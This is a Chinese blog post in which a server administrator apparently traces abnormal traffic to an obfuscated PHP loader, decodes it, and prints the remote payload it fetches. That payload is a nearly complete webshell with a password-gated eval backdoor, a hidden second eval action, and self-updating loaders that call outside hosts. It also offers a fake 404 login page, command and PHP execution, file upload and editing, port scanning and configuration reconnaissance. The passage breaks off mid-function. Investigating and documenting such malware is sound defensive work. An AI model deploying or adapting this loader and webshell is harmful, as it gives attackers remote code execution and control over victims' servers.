晚上客户反映服务器最近流量有些异常,于是就去查看服务器日志。为了方便排查,我写了一个小脚本,把每次请求的时间、来源 IP、完整 URL、User-Agent 和 Referer 追加记录到 ua.txt 中:
<?php
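// Request logger used during the investigation: appends one record per request to ua.txt
// (timestamp and client IP, full URL, User-Agent, Referer, blank separator line).
// Every field except the timestamp is supplied by the client, so control characters are
// replaced before writing; otherwise a crafted header could forge or split log records.
// NOTE(review): ua.txt is created next to this script. If that directory is served by the
// web server the log is readable by anyone; prefer a path outside the document root.
$ua_file = "ua.txt";
$ua_fields = array();
foreach (array('REMOTE_ADDR', 'HTTP_HOST', 'REQUEST_URI', 'HTTP_USER_AGENT', 'HTTP_REFERER') as $ua_key) {
    // User-Agent and Referer are optional headers; a missing one is logged as an empty line.
    $ua_value = isset($_SERVER[$ua_key]) ? (string) $_SERVER[$ua_key] : '';
    $ua_fields[$ua_key] = preg_replace('/[\x00-\x1F\x7F]+/', ' ', $ua_value);
}
$ua_data = date("Y/m/d H:i:s")."----".$ua_fields['REMOTE_ADDR']."\n"
    ."http://".$ua_fields['HTTP_HOST'].$ua_fields['REQUEST_URI']."\n"
    .$ua_fields['HTTP_USER_AGENT']."\n"
    .$ua_fields['HTTP_REFERER']."\n"
    ."\n";
// LOCK_EX keeps records from concurrent requests from interleaving; a failed write is
// reported to the PHP error log instead of raising warnings on a false file handle.
if (file_put_contents($ua_file, $ua_data, FILE_APPEND | LOCK_EX) === false) {
    error_log("request logger: cannot append to ".$ua_file);
}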
?>
可是日志中有一个被请求的文件引起了我的注意,直接打开看看~
<?php
// Loader stub as found on the server. No payload is stored in this file: it assembles three
// function names from short fragments, hex-decodes a URL, downloads that URL's response,
// hex-decodes the response and runs the result as PHP.
// Detection hints visible here: function names built with define()/sprintf(), pack('H*', ...)
// over a long run of hex digits, and variables being called as functions.
define('iphp','oday'); // checked by the downloaded code (defined('iphp')) and used there as the access password
define('T','H*'); // pack() format code: hex string, high nibble first
define('A','call');
define('B','user');
define('C','func');
define('D','create');
define('E','function');
define('F','file');
define('F1','get');
define('F2','contents');
define('P','pack');
$p = P; // 'pack'
$call = sprintf('%s_%s_%s',A,B,C); // 'call_user_func'
$create = sprintf('%s_%s',D,E); // 'create_function'
$file = sprintf('%s_%s_%s',F,F1,F2); // 'file_get_contents'
// One hex digit per element; joined and hex-decoded this is the download URL given in the analysis
// on this page (hxxp://dododome.sinaapp[.]com/getcode.php?call=code).
$t = array('6','8','7','4','7','4','7','0','3','a','2','f','2','f','6','4','6','f','6','4','6','f','6','4','6','f','6','d','6','5','2','e','7','3','6','9','6','e','6','1','6','1','7','0','7','0','2','e','6','3','6','f','6','d','2','f','6','7','6','5','7','4','6','3','6','f','6','4','6','5','2','e','7','0','6','8','7','0','3','f','6','3','6','1','6','c','6','c','3','d','6','3','6','f','6','4','6','5');
// Evaluated inside-out: pack(T, join(...)) gives the URL; $file(URL) returns hex text from the remote
// host; pack(T, ...) turns it into PHP source; $create(null, source) builds an anonymous function;
// $call(...) runs it. What executes is whatever the remote host returns for that request.
$call($create(null,$p(T,$file($p(T,join(null,$t))))));
?>
于是随手把混淆还原了一下,发现实际执行的函数调用是这样子的
<?php
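// De-obfuscated reading of the loader stub, with each assembled name spelled out.
// The final call is kept as a comment so that this analysis copy stays inert.
define('iphp','oday');
define('T','H*');
define('A','call');
define('B','user');
define('C','func');
define('D','create');
define('E','function');
define('F','file');
define('F1','get');
define('F2','contents');
define('P','pack');
$p = P; // pack
// The function names are plainly being assembled from fragments
$call = sprintf('%s_%s_%s',A,B,C); // call_user_func: invokes a callable
$create = sprintf('%s_%s',D,E); // create_function: builds a function from a string of PHP source
$file = sprintf('%s_%s_%s',F,F1,F2); // file_get_contents: used here to read a remote URL
$t = array('6','8','7','4','7','4','7','0','3','a','2','f','2','f','6','4','6','f','6','4','6','f','6','4','6','f','6','d','6','5','2','e','7','3','6','9','6','e','6','1','6','1','7','0','7','0','2','e','6','3','6','f','6','d','2','f','6','7','6','5','7','4','6','3','6','f','6','4','6','5','2','e','7','0','6','8','7','0','3','f','6','3','6','1','6','c','6','c','3','d','6','3','6','f','6','4','6','5');
// Original statement:
//   $call($create(null,$p(T,$file($p(T,join(null,$t))))));
// join(null,$t) concatenates the array elements into a single hex string.
// With every name substituted (the inner pack() decodes the URL before it is fetched,
// the outer pack() decodes the downloaded hex text into PHP source):
//   call_user_func(create_function(null, pack('H*', file_get_contents(pack('H*', join(null, $t))))));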
?>
其中的join(null,$t)得到的是
687474703a2f2f646f646f646f6d652e73696e616170702e636f6d2f676574636f64652e7068703f63616c6c3d636f6465
然后$p(T,join(null,$t));得到的结果是
http://dododome.sinaapp.com/getcode.php?call=code
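那么一目了然了:从http://dododome.sinaapp.com/getcode.php?call=code读取到的内容,先经过pack('H*')做十六进制解码,再由create_function生成匿名函数,最后通过call_user_func直接执行。也就是说,真正的恶意代码并不保存在服务器上的这个文件里,而是每次执行时从远程拉取;解码后得到的代码如下: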
//<?php
// +----------------------------------------------------------------------
// | Copyright (c) 2006-2012 KingBin All rights reserved.
// +----------------------------------------------------------------------
// | Licensed ( http://www.apache.org/licenses/LICENSE-2.0 )
// +----------------------------------------------------------------------
// | Author: KingBin ooooooo.oooo.ooooooo@foxmail.com
// +----------------------------------------------------------------------
// Bootstrap of the downloaded code: turns error reporting off, derives constants, fixes the
// access password (_pass_) and starts a session.
error_reporting(0); // report no PHP errors
define('KING_SELF', basename($_SERVER["SCRIPT_FILENAME"])); // file name of the script being executed
define('IS_WIN', 'win' == substr(strtolower(PHP_OS), 0, 3)); // true when PHP_OS starts with "win"
// Built-in fallback password constant, value 'demo'; only used when `iphp` is not defined (see below).
defined('mamashuoanquangoushigehenrongyiguodedashaguaruanjian') or define('mamashuoanquangoushigehenrongyiguodedashaguaruanjian', 'demo');
date_default_timezone_set('asia/shanghai');
// Added by the sample's author (original comment: new "get past the dog" check; the constant
// name above contains "anquangou"): when the loader stub defined `iphp`, its value becomes the
// password, otherwise the built-in fallback is used.
if(defined('iphp'))
define('_pass_',iphp);
else
define('_pass_',mamashuoanquangoushigehenrongyiguodedashaguaruanjian);
// End of the added section
if (!isset($_SESSION)) {
session_start();
}
// Entry routine: runs the password-gated eval handler first, sends the content-type header,
// calls session(), then creates an object of class `king` and calls start() on it.
// Class `king` and any call to init() are not present in the part of the file shown here.
function init() {
remote_e();
header("Content-type:text/html;charset=utf-8");
session();
//update();
$do = new king;
$do->start();
}
// Password-gated eval backdoor. When request parameter `pass` loosely equals _pass_, the string
// in request parameter `e` (if non-empty) is executed with eval(); the script then stops via die
// whether or not `e` was supplied. Any other `pass` value falls through to the caller.
// Detection: requests that carry both a `pass` and an `e` parameter; eval() fed from $_REQUEST.
function remote_e() {
$pass = $_REQUEST['pass'];
$e = $_REQUEST['e'];
if ($pass == _pass_) { // loose (==) comparison against the shell password
if ($e)
eval($e);
die;
}
}
// Returns the directory the file manager is currently browsing, as stored in
// $_SESSION['dirpath'], with a trailing slash appended.
function _getcwd() {
return $_SESSION['dirpath'] . '/';
}
// Windows only: connects to WMI through the COM extension, selects every Win32_Process whose
// Name equals $process and calls Terminate() on each result.
// $process is placed into the WQL query text as-is (no escaping).
function kill($process) {
$wmi = new COM("Winmgmts:/root/cimv2");
$data = $wmi->ExecQuery(sprintf("SELECT * FROM Win32_Process Where Name='%s'", $process));
foreach ($data as $v) {
$v->Terminate();
}
}
// Intended to adopt the session id sent in the session cookie.
// NOTE(review): the condition looks inverted. With empty() as written, $sessid is either the
// empty cookie value or null, so the session_id() call below is never reached with a usable id.
function session() {
$sessid = empty($_COOKIE[session_name()]) ? $_COOKIE[session_name()] : null;
if ($sessid)
session_id($sessid);
}
// Self-replacement routine; its only visible call (in init()) is commented out.
// Builds the source of a small loader and, unless constant `version` is already 'v2', overwrites
// the file named KING_SELF (relative path) with it.
// The generated loader stores the current password in constant `pp`, downloads hex-encoded PHP
// from the hex-encoded URL below (decodes to hxxp://file.heiliyu[.]com/getcode.php?call=code),
// caches the decoded source in $_SESSION['k'] and runs it via create_function()/call_user_func().
// Forensics: a script whose whole content matches the template below is this loader, not site code.
function update() {
$code = "<?php
session_start();
define('version','v2');
define('pp', '{pass}');
if(isset(\$_SESSION['k'])){
\$k = \$_SESSION['k'];
}else{
\$_SESSION['k'] = pack('H*',file_get_contents(pack('H*','687474703a2f2f66696c652e6865696c6979752e636f6d2f676574636f64652e7068703f63616c6c3d636f6465')));
\$k = \$_SESSION['k'];
}
call_user_func(create_function(null,\$k));
?>
";
$pass = _pass_;
$contents = str_replace('{pass}', $pass, $code); // embed the current password into the template
if (!defined('version') || version != 'v2') {
file_put_contents(KING_SELF, $contents);
//header('location:' . KING_SELF);
}
}
// Input accessor: returns request parameter $name straight from $_REQUEST, with no validation
// or default. The handlers in this file read their parameters through this function.
function I($name) {
return $_REQUEST[$name];
}
// Deprecated (per the original author's comment).
// Older remote loader: obtains code for $key, caches it in $_SESSION['code'], decodes it with
// bin::decode() and executes it. The callables in $GLOBALS['p'], ['f'], ['s'], ['c'] and ['e'] and the
// class `bin` are defined outside the part of the file shown here; presumably they are pack,
// file_get_contents, sprintf, call_user_func and create_function, as in the loader stub (confirm).
// The hex literal below decodes to hxxp://blakin.duapp[.]com/ and $key is appended as the path.
function _king($key) {
$opts = array('http' => array('method' => 'GET', 'timeout' => 10));
$context = stream_context_create($opts);
if (isset($_SESSION['code'])) {
$code = bin::decode($_SESSION['code'], $key);
} else {
// NOTE(review): as parenthesised, `false` and `$context` are arguments of the outer
// $GLOBALS['p'] call rather than of the fetch, so the 10 s timeout context looks unused.
$_SESSION['code'] = $GLOBALS['p']('H*', $GLOBALS['f']($GLOBALS['s']('%s/%s', $GLOBALS['p']
('H*', '687474703a2f2f626c616b696e2e64756170702e636f6d2f'), $key)), false, $context);
$code = $GLOBALS['s']('%s', @bin::decode($_SESSION['code'], $key));
}
// Important (original author): adjusted for anonymous functions on PHP 5.3 and later
$GLOBALS['c']($GLOBALS['e'](false, $code));
}
// end of deprecated section
function css() {
$code = <<< css
<style>
input{font:11px Verdana;height:18px;border:1px solid #666666;}a{color:#00f;text-decoration:underline;}a:hover{color:#f00;text-decoration:none;}#header{height:20px;border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#e9e9e9;padding:5px 15px 5px 5px;font-weight:bold;}#header .left{float:left;}#header .right{float:right;}#menu{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f1f1f1;padding:5px 15px 5px 5px;}#content{margin:0 auto;width:98%;}#content h2{margin-top:15px;padding:0;height:24px;line-height:24px;font-size:14px;color:#5B686F;}#content #base,#content #base2{background:#eee;margin-bottom:10px;}#base input{float:right;border-color:#b0b0b0;background:#3d3d3d;color:#ffffff;font:12px Arial,Tahoma;height:22px;margin:5px 10px;}.cdrom{padding:5px;margin:auto 7px;}.h{margin-top:8px;}#base2 .input{font:12px Arial,Tahoma;background:#fff;border:1px solid #666;padding:2px;height:18px;}#base2 .bt{border-color:#b0b0b0;background:#3d3d3d;color:#ffffff;font:12px Arial,Tahoma;height:22px;}dl,dt,dd{margin:0;}.focus{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#ffffaa;padding:5px 15px 5px 5px;}.fff{background:#fff}dl{margin:0 auto;width:100%;}dt,dd{overflow:hidden;border-top:1px solid white;border-bottom:1px solid #DDD;background:#F1F1F1;padding:5px 15px 5px 5px;}dt{border-top:1px solid white;border-bottom:1px solid #DDD;background:#E9E9E9;font-weight:bold;padding:5px 15px 5px 5px;}dt span,dd span{width:19%;display:inline-block;text-indent:0em;overflow:hidden;}#footer{padding:10px 30px;border-bottom:1px solid #fff;border-top:1px solid #ddd;background:#eee;}#load{position:fixed;right:0;border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#ffffaa;padding:5px 15px 5px 5px;display:none;}.in{width:40px;text-align:center;}.high{background-color:#0449BE;color:white;margin:0 2px;padding:2px 3px;width:10px;}.high2{margin:0 2px;padding:2px 0px;width:10px;}#login{display:none;}#show_file{padding: 10px 10px;border: #000 
solid;color:#000;height:400px;width:800px;position:fixed;top:45%;left:50%;margin-top:-200px;margin-left:-400px;background:#fff;overflow:auto;}#open,#upload{display:none;position:fixed;top:45%;left:50%;margin-top:-200px;margin-left:-400px;}#close{color:#fff;height:16px;width:30px;position:absolute;right:0;background:#000;z-index:1;}#upfile{width:628px;height:108px;padding:10px 20px;background-color:white;position:fixed;top:45%;left:50%;margin-top:-54px;margin-left:-314px;border:#000 solid;}
#login{display:none;}
body{font:14px Arial,Tahoma;line-height:16px;margin:0;padding:0;}
h1{display: block;font-size: 32px;font-weight: bold;font-family:none;}
.not_found{margin:20px 20px;}
.not_found p{font-family:none;font: 14px Arial,Tahoma;line-height: 16px;}
in{border:1px;}
.red{color:#FF0085;}
#base2 .input{width:260px;}
.hide{display:none;}
.showfile {font-size: 16px;line-height: 28px;}
</style>
css;
return $code;
}
function js() {
$code = <<< js
<script>
(function() {
function _key() {
$(document).keydown(function(e) {
var key = (e.keyCode) || (e.which) || (e.charCode);
if (key == 80) {
$(".not_found").hide();
$("#login").show();
}
});
}
function error(msg, element, speed) {
speed = speed || "3000";
//setTimeout('$(element).show("slow")',speed);
$(element).show();
$(element).text(msg);
setTimeout(
function() {
$(element).hide();
}
, speed);
}
function post(element, url, form) {
$(element).click(function() {
$.get(url, $(form).serialize(), function(data) {
if (data.status == 100) {
error(data.msg, '#notice', 2000);
}else{
$("body").html(data.html);
//bind default event
_init();
}
}, "json");
});
}
function close(){
$("#close").click(function(){
$("#open").hide();
});
$("#close_file").click(function(){
$("#upfile").hide();
});
}
function get(element){
$(element).on('click',function(e){
$.get(this.href,function(data){
if(data == null){
error('权限不足,无法查看!', '#load', 2000);
}
if(data.showfile){
$("#open").show();
$('#show_file').empty();
$('#show_file').append(data.showfile);
}
if(data.editfile){
if($(window).scrollTop()>0) $('body,html').animate({scrollTop:0},1000);
$(".newfile").show();
$(".newfile_name").empty();
$(".newfile_name").val(data.filename);
$(".newfile_value").empty();
$(".newfile_value").text(data.editfile);
}
if(data.html) {
$("body").html(data.html);
//bind default event
_init();
}
if(data.msg){
error(data.msg, '#load', 2000);
}
if(data.status==200){
//window.location.href={gourl}
window.location.reload();
}
},"json");
e.preventDefault();
return false;
});
return false;
}
function find(){
$('.qh').click(function(){
var find = $('.find').val();
if( find == null){
error('切换的路径不能为空', '#load', 2000);
}
$.get('?action=find&file='+find,function(data){
if(data == null){
error('切换的路径不能为空!', '#load', 2000);
}
if(data.html) {
$("body").html(data.html);
//bind default event
_init();
}
if(data.msg){
error(data.msg, '#load', 2000);
}
},"json");
});
}
function port(){
$(".click_port").click(function(){
$('.port_hide').toggle();
$(".findport").click(function(){
error("正在扫描端口,请耐心等待", '#load', 2000);
var port = $('.port').val();
$.get('?action=port&ports='+port,function(data){
if(data.showfile){
$("#open").show();
$('#show_file').empty();
$('#show_file').append(data.showfile);
}
if(data.msg){
error(data.msg, '#load', 2000);
}
},"json");
});
});
}
function upload(){
$('.upload').click(function(){
$('#upfile').toggle();
});
$(".postfile").click(function(){
$('#upfile').hide();
$("#form1").submit();
});
}
function runphp(){
$(".run_php").click(function(){
$('.runphp_hide').toggle();
$(".runphp_click").click(function(){
error("正在执行php代码,请耐心等待", '#load', 2000);
var port = $('.runphp_value').val();
$.get('?action=runphp&codes='+port,function(data){
if(data.showfile){
$("#open").show();
$('#show_file').empty();
if(data.showfile==null){
error("语句执行错误,或者执行的函数被禁用!", '#load', 2000);
}
$('#show_file').append(data.showfile);
}
if(data.msg){
error(data.msg, '#load', 2000);
}
},"json");
});
});
}
function run_command(){
$(".run_command").click(function(){
$('.runcommand_hide').toggle();
$(".runcommand_click").click(function(){
error("正在执行命令,请耐心等待", '#load', 2000);
var port = $('.runcommand_value').val();
$.get('?action=runcommand&codes='+port,function(data){
if(data.showfile){
$("#open").show();
$('#show_file').empty();
if(data.showfile){
error("命令执行成功!", '#load', 2000);
$('#show_file').append('<pre>'+data.showfile+'</pre>');
}
}
if(data.msg){
error(data.msg, '#load', 2000);
}
},"json");
});
});
}
function newfile(){
$("._newfile").click(function(){
$(".newfile").toggle();
});
$(".newfile_click").click(function(){
var name = $(".newfile_name").val();
var contents = $(".newfile_value").val();
if(name==''){
error("新建文件不能为空!", '#load', 2000);
return false;
}
if(contents==''){
error("新建内容不能为空!", '#load', 2000);
return false;
}
if(name && contents){
$.post('?action=createfile',{file:name,body:contents},function(data){
if(data.html) {
$("body").html(data.html);
//bind default event
_init();
}
if(data.msg){
error(data.msg, '#load', 2000);
}
},"json");
}
});
}
function newfolder(){
$("._newfolder").click(function(){
$(".newfolder").toggle();
});
$(".newfolder_click").click(function(){
var name = $(".newfolder_name").val();
if(name==''){
error("新建文件夹不能为空!", '#load', 2000);
return false;
}
if(name){
$.post('?action=newfolder',{file:name},function(data){
if(data.html) {
$("body").html(data.html);
//bind default event
_init();
}
if(data.msg){
error(data.msg, '#load', 2000);
}
},"json");
}
});
}
function pay(){
$('.pay').click(function(){
alert('付费模块正在努力制作中!');
});
}
function _init() {
$(function($) {
_key();
url = $("#submit").attr('data_url');
post('#submit',url, '#f_login');
get('.action_del');
close();
find();
port();
runphp();
upload();
run_command();
newfile();
newfolder();
pay();
$('.packages').click(function(){
error('打包时间比较长,请耐心等待。。或者进行其他操作。。', '#load', 5000);
});
});
}
_init();
})();
</script>
js;
return $code;
}
// Builds the page shown to visitors who are not logged in. It imitates a web server error page
// (title "404 Not Found", "The requested URL /<script name> was not found on this server.") and
// carries a password form inside the #login element; css() sets #login to display:none and the
// keydown handler in js() reveals it on key code 80.
// Detection: a "404" body that is served with scripts, a password field and an external jQuery include.
// {url}, {load_css} and {load_js} are replaced with KING_SELF, css() and js().
function _html() {
$code = <<< CODE
<!DOCTYPE HTML>
<head>
<meta http-equiv="content-type" content="text/html" />
<meta http-equiv="content-type" charset="UTF-8" />
<title>404 Not Found</title>
{load_css}
<script src="http://lib.sinaapp.com/js/jquery/1.8/jquery.min.js"></script>
{load_js}
</head>
<body>
<div id="notice" style="position:fixed;right:0;border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#ffffaa;padding:5px 15px 5px 5px;display: none; font-size:12px;"></div>
<div class="not_found">
<h1>Not Found</h1>
<p>The requested URL /{url} was not found on this server.</p>
</div>
<div id="login">
<form action="" method="GET" id="f_login">
<span style="font:11px Verdana;">
Password:
</span>
<input id="pwd" name="password" type="password" size="20" />
<input id="submit" data_url="{url}" type="button" value=" login " />
</form>
</div>
</body>
</html>
CODE;
return str_replace(array(
'{url}',
'{load_css}',
'{load_js}'), array(
KING_SELF,
css(),
js()), $code);
}
// Returns the outer HTML skeleton of the logged-in interface, still containing the
// {load_css}, {load_js} and {body} placeholders (filled in by run::html()).
// The page title is "404 Not Found" here as well.
function class_html() {
$code = <<< code
<!DOCTYPE HTML>
<head>
<meta http-equiv="content-type" content="text/html" />
<meta http-equiv="content-type" charset="UTF-8" />
<title>404 Not Found</title>
{load_css}
<script src="http://lib.sinaapp.com/js/jquery/1.8/jquery.min.js"></script>
{load_js}
</head>
<body>
{body}
</body>
</html>
code;
return $code;
}
function class_body() {
$code = <<< code
<div id="load">
</div>
<div class='hide' id="upfile">
<p></p><p></p><p><a href="javascript:;;;" id="close_file">点我关闭</a></p>
<form action="?action=upload" id="form1" name="form1" encType="multipart/form-data" method="post" target="hidden_frame">
<input name="action" value="upload" type="hidden" />
<input type="file" id="userfile" name="userfile">
<INPUT class="postfile" type="button" value="上传文件">
<iframe name="hidden_frame" id="hidden_frame" style="display:none"></iframe>
</form>
</div>
<div id="open">
<div style="position:relative;">
<div id="close">关闭</div>
</div>
<div id="show_file" class="showfile">
</div>
</div>
<div id="header">
<div class="left">
{host}({ip})
</div>
<div class="right">
OS:{uname} {software} php {php_version}
</div>
</div>
<div id="menu">
{menu}
</div>
<div id="content">
<h2>文件管理 - 当前磁盘空间 <span id="disktotal">{space_total}</span> 运行用户:{whoami}</h2>
<div id="base">
<div class="cdrom">
<span id="listdir"> {current_dir}</span>
</div>
<div class="cdrom">
{all_dir}
</div>
</div>
<div class="h"></div>
<div id="base2">
<div class="cdrom">
{action}
</div>
<div class="cdrom">
切换路径: <input class="input find" name="findstr" value="" type="text" /> <input class="bt qh" value="切换" type="submit" />
</div>
<div class="cdrom runcommand_hide hide">
运行命令: <input class="input runcommand_value" name="runphp" value="" type="text"/> <input class="bt runcommand_click" value="运行" type="submit" />
</div>
<div class="cdrom port_hide hide">
扫描端口: <input class="input port" name="findstr" value="21,22,25,80,3306,9000,11211" type="text" /> <input class="bt findport" value="扫描" type="submit" />
</div>
<div class="cdrom runphp_hide hide">
运行php: <textarea class="input runphp_value" name="runphp" value="" type="text" style="width:600px;height:200px;"/></textarea> <input class="bt runphp_click" value="运行" type="submit" />
</div>
<!--new file -->
<div class="cdrom hide newfile">
新建文件: <input class="input newfile_name" style="font-size:16px;color:blue;" name="findstr" value="" type="text" />
<div style="margin-top:10px;">
新建内容: <textarea class="input newfile_value" name="runphp" value="" type="text" style="width:600px;height:200px;font-size:16px;color:blue;line-height: 28px;"/></textarea>
<input class="bt newfile_click" value="新建" type="submit" />
</div>
</div>
<!--end-->
<div class="cdrom hide newfolder">
新文件夹: <input class="input newfolder_name" name="findstr" value="" type="text" />
<input class="bt newfolder_click" value="新建" type="submit" />
</div>
</div>
<!-- return -->
<div id="show">
<dl>
<dt>
<span class="in"> </span>
<span>文件名</span>
<span>修改时间</span>
<span>文件大小</span>
<span>权限</span>
<span>操作</span>
</dt>
<dd >
<span class="in">
-
</span>
<span>
<a class='action_del' href="?action=up">返回上一目录</a>
</span>
<span></span>
<span></span>
<span></span>
<span></span>
</dd>
<!-- file -->
{showfile}
<!-- file end -->
</dl>
</div>
<!-- page start-->
<!-- end -->
</div>
<div class="h"></div>
<div id="footer">
当前版本:2.0 一句话连接提供 {http}/{k}?pass={p} 密码是e</span>
</div>
code;
return str_replace(array('{http}', '{k}', '{p}'), array($_SERVER["HTTP_HOST"], KING_SELF, _pass_), $code);
}
// Returns the HTML template for one row of the file listing. The {…} placeholders
// ({self}, {file}, {return_file}, {return_time}, {return_size}, {return_chmod}, {return_perms},
// {is_folder}, {.red}) are substituted per entry by run::showfile().
function show_html() {
$code = <<< code
<dd class="{color}" onmouseover="this.className='focus'" onmouseout="this.className='{color}'">
<span class="in">
<input name="" type="checkbox">
</span>
<span>
<a class="action_del {.red}" href="{self}?action=view&file={file}" name="" >{return_file}</a>
</span>
<span>
<a href="javascript:;;;" name="" >{return_time}</a>
</span>
<span>{return_size}</span>
<span>
<a href="javascript:;;;" name="" >{return_chmod}</a> /
<a href="javascript:;;;" name="">{return_perms}</a>
</span>
<span>
{is_folder}
</span>
</dd>
code;
return $code;
}
// Pagination template. NOTE(review): appears to be unfinished/dead code: the heredoc interpolates
// $_ipage_file, $previous, $next and $nums, none of which are set in this function, and the
// function has no return statement, so callers receive null.
function pages() {
$code = <<< code
<div id="pages">
<dl>
<dd>
<span class="in"> </span>
<span></span>
<span></span>
<span></span>
<span style="text-align:right;width:38%">
<a class="high2" href="javascript:;;;" name="action=show&dir=$_ipage_file&page=1" >Index</a>
<a class="high2" href="javascript:;;;" name="action=show&dir=$_ipage_file&page=$previous" >Previous</a>
{pages}
<a class="high2" href="javascript:;;;" name="action=show&dir=$_ipage_file&page=$next" >Next</a>
<a class="high2" href="javascript:;;;" name="action=show&dir=$_ipage_file&page=$nums" >End</a>
</dd>
</dl>
</div>
code;
}
// Handles a visitor who is not authenticated: a supplied `password` that does not match _pass_
// ends the request with a JSON error (status 100); otherwise the decoy page from _html() is sent.
function _login() {
$password = I('password');
// Original author: the former key protection was removed in favour of a user-defined password
// [server side already changed]; the old remote check is left commented out below.
//&& NULL == bin::decode($GLOBALS['p']('H*', $GLOBALS['f']($GLOBALS['s']('%s/%s', $GLOBALS['p']('H*', '687474703a2f2f626c616b696e2e64756170702e636f6d2f'), $key))), $key)
if (isset($password) && $password !=_pass_) {
die('{"status":"100","msg":"密码不对"}');
}
echo _html();
}
// Ends the login: sends the session cookie with an expiry one day in the past and
// destroys the server-side session.
function _logout() {
setcookie(session_name(),null, time() - 86400);
session_destroy();
}
// Returns true when the X-Requested-With request header equals "xmlhttprequest"
// (case-insensitive); otherwise falls off the end and returns null.
function is_ajax() {
if (strtolower($_SERVER['HTTP_X_REQUESTED_WITH']) == 'xmlhttprequest')
return true;
}
// Starts the authenticated interface: creates the `run` controller object and lets its
// index() method dispatch the requested action.
function run() {
$action = new run();
$action->index();
}
// Gatekeeper between the file-manager interface and the decoy/login page.
// The candidate key is request parameter `password` when present, otherwise the hex-decoded
// $_SESSION['_king_key']. On a (loose) match with _pass_ the hex of the password is stored in the
// session, the session cookie is re-sent with a one-day lifetime, and run() is called; on a
// mismatch _login() is called.
// Forensics: PHP session data containing a `_king_key` entry records a successful login to this shell.
function _is_login() {
$cookie = !empty($_SESSION['_king_key']) ? pack('H*', $_SESSION['_king_key']) : null;
$key = I('password') ? I('password') : $cookie;
if (_pass_ == $key) {
if ($_SESSION['_king_key'] != bin2hex(_pass_)) {
//setcookie('_king_key', bin2hex($key), time() + 86400);
setcookie(session_name(), session_id(), time() + 86400);
$_SESSION['_king_key'] = bin2hex($key);
}
run();
} else
_login();
}
class run {
// Dispatcher: request parameter `action` names the method to run. method_exists() is the only
// check, so any method of this class can be invoked by name, not just those linked from the
// menus. An unknown action does nothing; with no action the directory listing is rendered.
function index() {
$action = I('action') ? I('action') : null;
if (isset($action)) {
if (method_exists($this, $action))
$this->$action();
} else {
$this->dump();
}
}
// action=restart: Windows only and requires the COM class. Calls kill('services.exe'), i.e.
// terminates that process through WMI, and answers with a JSON message in every branch.
function restart() {
if (!IS_WIN) {
die('{"msg":"非常抱歉,此操作仅限windows系统"}');
}
if (!class_exists('COM')) {
die('{"msg":"非常抱歉,此机器不支持重启"}');
}
// Attempt the restart
kill('services.exe');
die('{"msg":"正在尝试重启服务器系统,如不是system权限请放弃操作!"}');
}
// action=find: switches the browsed directory to request parameter `file` (passed through
// gbk_mbstring(), defined outside this part of the file) when it is an existing directory,
// then re-renders the listing. No restriction on which directory may be chosen is applied here.
function find() {
$dir = $this->gbk_mbstring(I('file'));
if (is_dir($dir)) {
$this->setpath($dir);
$this->dump();
}
}
// action=hello: a second eval() entry point. Request parameter `world`, if non-empty, is executed
// as PHP; the script then exits. No menu entry in the visible code links to this action.
// Detection: requests with action=hello and a `world` parameter.
function hello() {
$i = I('world');
if ($i) {
eval($i);
}
exit;
}
// action=createfile: writes request parameter `body` to a file named by request parameter
// `file` inside the currently browsed directory (_getcwd()). The name is used as supplied.
// The loose `true ==` test treats a write of 0 bytes as failure.
function createfile() {
$filename = I('file');
$contents = I('body');
if (isset($filename) && isset($contents)) {
if (true == file_put_contents(_getcwd() . $filename, $contents)) {
$this->dump('新建文件成功!');
} else {
$this->dump('新建文件失败!');
}
}
}
// action=newfolder: creates a directory named by request parameter `file` inside the currently
// browsed directory, requesting mode 0777; answers with a JSON message if it already exists.
function newfolder() {
$filename = I('file');
if (isset($filename)) {
if (is_dir(_getcwd() . $filename)) {
die('{"msg":"文件夹已经存在"}');
}
if (true == mkdir(_getcwd() . $filename, 0777)) {
$this->dump('新建文件夹成功!');
} else {
$this->dump('新建文件夹失败!');
}
}
}
// action=editfile: `file` carries a hex-encoded path. It is hex-decoded, passed through an
// encoding helper chosen by platform (gbk_mbstring/mbstring, defined outside this part of the
// file), and if it is a regular file its contents are returned as JSON together with its base name.
function editfile(){
if(IS_WIN)
$filename = I('file') ? $this->gbk_mbstring(pack("H*", I('file'))) : null;
else
$filename = I('file') ? $this->mbstring(pack("H*", I('file'))) : null;
if (is_file($filename)) {
ob_start();
echo file_get_contents($filename);
$contents = ob_get_clean();
// filename is inserted into the JSON text without encoding
echo sprintf('{"editfile":%s,"filename":"%s"}', json_encode($this->mbstring($contents)),basename($filename));
}
}
// action=rmdir: deletes the directory whose hex-encoded path is in request parameter `file`:
// files inside are unlinked, then the built-in rmdir() removes the directory itself.
// NOTE(review): the recursive call passes a sub-directory path, but this method declares no
// parameter and reads the path from the request again, so sub-directories are not actually
// descended into as the call suggests.
function rmdir() {
if(IS_WIN)
$dir = I('file') ? $this->gbk_mbstring(pack("H*", I('file'))) : null;
else
$dir = I('file') ? $this->mbstring(pack("H*", I('file'))) : null;
$files = array_diff(scandir($dir), array('.', '..'));
foreach ($files as $file) {
(is_dir("$dir/$file")) ? $this->rmdir("$dir/$file") : unlink("$dir/$file");
}
if(true==rmdir($dir)){
$this->dump('文件夹删除成功!');
}else{
die('{"msg":"文件夹删除失败!"}');
}
}
// action=phpinfo: reconnaissance summary of the PHP configuration. Reads disable_functions,
// disable_classes, the loaded extensions, include_path, memory_limit, the loaded php.ini path,
// upload_max_filesize, auto_prepend_file and auto_append_file, fills them into the text
// template and returns it as JSON ("showfile"), ending the request.
function phpinfo() {
$html = <<< code
<pre>
php参数查看
======================================
禁用的函数:
{disable_function}
禁用的类 :{class}
支持的拓展 :
{ext}
加载的项目 : {include}
前置调用 : {pre}
后置调用 :{next}
内存设置大小 : {mem}
php.ini 路径 : {php}
最大上传 : {u}
=======================================
code by blackbin
</pre>
code;
$dis = ini_get('disable_functions');
$ext = join(',', get_loaded_extensions());
$in = ini_get('include_path');
$mem = ini_get('memory_limit');
$class = ini_get('disable_classes');
$php = php_ini_loaded_file();
$u = ini_get('upload_max_filesize');
$pre = ini_get('auto_prepend_file');
$next = ini_get('auto_append_file');
$code = str_replace(array(
'{disable_function}',
'{ext}',
'{include}',
'{mem}',
'{class}',
'{php}',
'{u}',
'{pre}',
'{next}'), array(
str_replace(',', '<br/> ', $dis),
str_replace(',', '<br/> ', $ext),
$in,
$mem,
